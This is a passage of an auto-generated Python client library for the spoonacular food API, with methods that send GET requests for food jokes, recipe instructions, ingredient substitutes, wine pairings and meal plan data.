response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_a_random_food_joke(self, **kwargs): # noqa: E501
"""Get a Random Food Joke # noqa: E501
Get a random joke that is related to food. Caution: this is an endpoint for adults! # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_a_random_food_joke(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_a_random_food_joke_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_a_random_food_joke_with_http_info(**kwargs) # noqa: E501
return data
def get_a_random_food_joke_with_http_info(self, **kwargs): # noqa: E501
"""Get a Random Food Joke # noqa: E501
Get a random joke that is related to food. Caution: this is an endpoint for adults! # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_a_random_food_joke_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_a_random_food_joke" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/jokes/random', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_analyzed_recipe_instructions(self, id, **kwargs): # noqa: E501
"""Get Analyzed Recipe Instructions # noqa: E501
Get an analyzed breakdown of a recipe's instructions. Each step is enriched with the ingredients and equipment required. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_analyzed_recipe_instructions(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The recipe id. (required)
:param bool step_breakdown: Whether to break down the recipe steps even more.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_analyzed_recipe_instructions_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_analyzed_recipe_instructions_with_http_info(id, **kwargs) # noqa: E501
return data
def get_analyzed_recipe_instructions_with_http_info(self, id, **kwargs): # noqa: E501
"""Get Analyzed Recipe Instructions # noqa: E501
Get an analyzed breakdown of a recipe's instructions. Each step is enriched with the ingredients and equipment required. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_analyzed_recipe_instructions_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The recipe id. (required)
:param bool step_breakdown: Whether to break down the recipe steps even more.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'step_breakdown'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_analyzed_recipe_instructions" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in local_var_params or
local_var_params['id'] is None):
raise ApiValueError("Missing the required parameter `id` when calling `get_analyzed_recipe_instructions`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'step_breakdown' in local_var_params:
query_params.append(('stepBreakdown', local_var_params['step_breakdown'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/{id}/analyzedInstructions', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_comparable_products(self, upc, **kwargs): # noqa: E501
"""Get Comparable Products # noqa: E501
Find comparable products to the given one. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_comparable_products(upc, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float upc: The UPC of the product for which you want to find comparable products. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_comparable_products_with_http_info(upc, **kwargs) # noqa: E501
else:
(data) = self.get_comparable_products_with_http_info(upc, **kwargs) # noqa: E501
return data
def get_comparable_products_with_http_info(self, upc, **kwargs): # noqa: E501
"""Get Comparable Products # noqa: E501
Find comparable products to the given one. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_comparable_products_with_http_info(upc, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float upc: The UPC of the product for which you want to find comparable products. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['upc'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_comparable_products" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'upc' is set
if ('upc' not in local_var_params or
local_var_params['upc'] is None):
raise ApiValueError("Missing the required parameter `upc` when calling `get_comparable_products`") # noqa: E501
collection_formats = {}
path_params = {}
if 'upc' in local_var_params:
path_params['upc'] = local_var_params['upc'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/products/upc/{upc}/comparable', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_conversation_suggests(self, query, **kwargs): # noqa: E501
"""Get Conversation Suggests # noqa: E501
This endpoint returns suggestions for things the user can say or ask the chatbot. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_conversation_suggests(query, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str query: A (partial) query from the user. The endpoint will return if it matches topics it can talk about. (required)
:param float number: The number of suggestions to return (between 1 and 25).
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_conversation_suggests_with_http_info(query, **kwargs) # noqa: E501
else:
(data) = self.get_conversation_suggests_with_http_info(query, **kwargs) # noqa: E501
return data
def get_conversation_suggests_with_http_info(self, query, **kwargs): # noqa: E501
"""Get Conversation Suggests # noqa: E501
This endpoint returns suggestions for things the user can say or ask the chatbot. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_conversation_suggests_with_http_info(query, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str query: A (partial) query from the user. The endpoint will return if it matches topics it can talk about. (required)
:param float number: The number of suggestions to return (between 1 and 25).
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['query', 'number'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_conversation_suggests" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'query' is set
if ('query' not in local_var_params or
local_var_params['query'] is None):
raise ApiValueError("Missing the required parameter `query` when calling `get_conversation_suggests`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'query' in local_var_params:
query_params.append(('query', local_var_params['query'])) # noqa: E501
if 'number' in local_var_params:
query_params.append(('number', local_var_params['number'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/converse/suggest', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_dish_pairing_for_wine(self, wine, **kwargs): # noqa: E501
"""Get Dish Pairing for Wine # noqa: E501
Find a dish that goes well with a given wine. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_dish_pairing_for_wine(wine, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str wine: The type of wine that should be paired, e.g. \"merlot\", \"riesling\", or \"malbec\". (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_dish_pairing_for_wine_with_http_info(wine, **kwargs) # noqa: E501
else:
(data) = self.get_dish_pairing_for_wine_with_http_info(wine, **kwargs) # noqa: E501
return data
def get_dish_pairing_for_wine_with_http_info(self, wine, **kwargs): # noqa: E501
"""Get Dish Pairing for Wine # noqa: E501
Find a dish that goes well with a given wine. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_dish_pairing_for_wine_with_http_info(wine, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str wine: The type of wine that should be paired, e.g. \"merlot\", \"riesling\", or \"malbec\". (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['wine'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_dish_pairing_for_wine" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'wine' is set
if ('wine' not in local_var_params or
local_var_params['wine'] is None):
raise ApiValueError("Missing the required parameter `wine` when calling `get_dish_pairing_for_wine`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'wine' in local_var_params:
query_params.append(('wine', local_var_params['wine'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/wine/dishes', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_ingredient_information(self, id, **kwargs): # noqa: E501
"""Get Ingredient Information # noqa: E501
Use an ingredient id to get all available information about an ingredient, such as its image and supermarket aisle. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_ingredient_information(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The ingredient id. (required)
:param float amount: The amount of this ingredient.
:param str unit: The unit for the given amount.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_ingredient_information_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_ingredient_information_with_http_info(id, **kwargs) # noqa: E501
return data
def get_ingredient_information_with_http_info(self, id, **kwargs): # noqa: E501
"""Get Ingredient Information # noqa: E501
Use an ingredient id to get all available information about an ingredient, such as its image and supermarket aisle. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_ingredient_information_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The ingredient id. (required)
:param float amount: The amount of this ingredient.
:param str unit: The unit for the given amount.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'amount', 'unit'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_ingredient_information" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in local_var_params or
local_var_params['id'] is None):
raise ApiValueError("Missing the required parameter `id` when calling `get_ingredient_information`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'amount' in local_var_params:
query_params.append(('amount', local_var_params['amount'])) # noqa: E501
if 'unit' in local_var_params:
query_params.append(('unit', local_var_params['unit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/ingredients/{id}/information', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_ingredient_substitutes(self, ingredient_name, **kwargs): # noqa: E501
"""Get Ingredient Substitutes # noqa: E501
Search for substitutes for a given ingredient. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_ingredient_substitutes(ingredient_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str ingredient_name: The name of the ingredient you want to replace. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_ingredient_substitutes_with_http_info(ingredient_name, **kwargs) # noqa: E501
else:
(data) = self.get_ingredient_substitutes_with_http_info(ingredient_name, **kwargs) # noqa: E501
return data
def get_ingredient_substitutes_with_http_info(self, ingredient_name, **kwargs): # noqa: E501
"""Get Ingredient Substitutes # noqa: E501
Search for substitutes for a given ingredient. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_ingredient_substitutes_with_http_info(ingredient_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str ingredient_name: The name of the ingredient you want to replace. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['ingredient_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_ingredient_substitutes" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'ingredient_name' is set
if ('ingredient_name' not in local_var_params or
local_var_params['ingredient_name'] is None):
raise ApiValueError("Missing the required parameter `ingredient_name` when calling `get_ingredient_substitutes`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'ingredient_name' in local_var_params:
query_params.append(('ingredientName', local_var_params['ingredient_name'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/ingredients/substitutes', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_ingredient_substitutes_by_id(self, id, **kwargs): # noqa: E501
"""Get Ingredient Substitutes by ID # noqa: E501
Search for substitutes for a given ingredient. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_ingredient_substitutes_by_id(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The id of the ingredient you want substitutes for. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_ingredient_substitutes_by_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_ingredient_substitutes_by_id_with_http_info(id, **kwargs) # noqa: E501
return data
def get_ingredient_substitutes_by_id_with_http_info(self, id, **kwargs): # noqa: E501
"""Get Ingredient Substitutes by ID # noqa: E501
Search for substitutes for a given ingredient. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_ingredient_substitutes_by_id_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The id of the ingredient you want substitutes for. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_ingredient_substitutes_by_id" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in local_var_params or
local_var_params['id'] is None):
raise ApiValueError("Missing the required parameter `id` when calling `get_ingredient_substitutes_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/ingredients/{id}/substitutes', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_meal_plan_template(self, username, id, hash, **kwargs): # noqa: E501
"""Get Meal Plan Template # noqa: E501
Get information about a meal plan template. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_meal_plan_template(username, id, hash, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str username: The username. (required)
:param float id: The shopping list item id. (required)
:param str hash: The private hash for the username. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_meal_plan_template_with_http_info(username, id, hash, **kwargs) # noqa: E501
else:
(data) = self.get_meal_plan_template_with_http_info(username, id, hash, **kwargs) # noqa: E501
return data
def get_meal_plan_template_with_http_info(self, username, id, hash, **kwargs): # noqa: E501
"""Get Meal Plan Template # noqa: E501
Get information about a meal plan template. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_meal_plan_template_with_http_info(username, id, hash, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str username: The username. (required)
:param float id: The shopping list item id. (required)
:param str hash: The private hash for the username. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['username', 'id', 'hash'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_meal_plan_template" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'username' is set
if ('username' not in local_var_params or
local_var_params['username'] is None):
raise ApiValueError("Missing the required parameter `username` when calling `get_meal_plan_template`") # noqa: E501
# verify the required parameter 'id' is set
if ('id' not in local_var_params or
local_var_params['id'] is None):
raise ApiValueError("Missing the required parameter `id` when calling `get_meal_plan_template`") # noqa: E501
# verify the required parameter 'hash' is set
if ('hash' not in local_var_params or
local_var_params['hash'] is None):
raise ApiValueError("Missing the required parameter `hash` when calling `get_meal_plan_template`") # noqa: E501
collection_formats = {}
path_params = {}
if 'username' in local_var_params:
path_params['username'] = local_var_params['username'] # noqa: E501
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'hash' in local_var_params:
query_params.append(('hash', local_var_params['hash'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/mealplanner/{username}/templates/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_meal_plan_templates(self, username, hash, **kwargs): # noqa: E501
"""Get Meal Plan Templates # noqa: E501
Get meal plan templates from user or public ones. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_meal_plan_templates(username, hash, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str username: The username. (required)
:param str hash: The private hash for the username. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_meal_plan_templates_with_http_info(username, hash, **kwargs) # noqa: E501
else:
(data) = self.get_meal_plan_templates_with_http_info(username, hash, **kwargs) # noqa: E501
return data
def get_meal_plan_templates_with_http_info(self, username, hash, **kwargs): # noqa: E501
"""Get Meal Plan Templates # noqa: E501
Get meal plan templates from user or public ones. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_meal_plan_templates_with_http_info(username, hash, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str username: The username. (required)
:param str hash: The private hash for the username. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['username', 'hash'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_meal_plan_templates" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'username' is set
if ('username' not in local_var_params or
local_var_params['username'] is None):
raise ApiValueError("Missing the required parameter `username` when calling `get_meal_plan_templates`") # noqa: E501
# verify the required parameter 'hash' is set
if ('hash' not in local_var_params or
local_var_params['hash'] is None):
raise ApiValueError("Missing the required parameter `hash` when calling `get_meal_plan_templates`") # noqa: E501
collection_formats = {}
path_params = {}
if 'username' in local_var_params:
path_params['username'] = local_var_params['username'] # noqa: E501
query_params = []
if 'hash' in local_var_params:
query_params.append(('hash', local_var_params['hash'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/mealplanner/{username}/templates', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_meal_plan_week(self, username, start_date, hash, **kwargs): # noqa: E501
"""Get Meal Plan Week # noqa: E501
Retrieve a meal planned week for the given user. The username must be a spoonacular user and the hash must the the user's hash that can be found in his/her account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_meal_plan_week(username, start_date, hash, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str username: The username. (required)
:param str start_date: The start date of the meal planned week in the format yyyy-mm-dd. (required)
:param str hash: The private hash for the username. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_meal_plan_week_with_http_info(username, start_date, hash, **kwargs) # noqa: E501
else:
(data) = self.get_meal_plan_week_with_http_info(username, start_date, hash, **kwargs) # noqa: E501
return data
def get_meal_plan_week_with_http_info(self, username, start_date, hash, **kwargs): # noqa: E501
"""Get Meal Plan Week # noqa: E501
Retrieve a meal planned week for the given user. The username must be a spoonacular user and the hash must the the user's hash that can be found in his/her account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_meal_plan_week_with_http_info(username, start_date, hash, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str username: The username. (required)
:param str start_date: The start date of the meal planned week in the format yyyy-mm-dd. (required)
:param str hash: The private hash for the username. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['username', 'start_date', 'hash'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_meal_plan_week" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'username' is set
if ('username' not in local_var_params or
local_var_params['username'] is None):
raise ApiValueError("Missing the required parameter `username` when calling `get_meal_plan_week`") # noqa: E501
# verify the required parameter 'start_date' is set
if ('start_date' not in local_var_params or
local_var_params['start_date'] is None):
raise ApiValueError("Missing the required parameter `start_date` when calling `get_meal_plan_week`") # noqa: E501
# verify the required parameter 'hash' is set
if ('hash' not in local_var_params or
local_var_params['hash'] is None):
raise ApiValueError("Missing the required parameter `hash` when calling `get_meal_plan_week`") # noqa: E501
collection_formats = {}
path_params = {}
if 'username' in local_var_params:
path_params['username'] = local_var_params['username'] # noqa: E501
if 'start_date' in local_var_params:
path_params['start-date'] = local_var_params['start_date'] # noqa: E501
query_params = []
if 'hash' in local_var_params:
query_params.append(('hash', local_var_params['hash'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/mealplanner/{username}/week/{start-date}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_menu_item_information(self, id, **kwargs): # noqa: E501
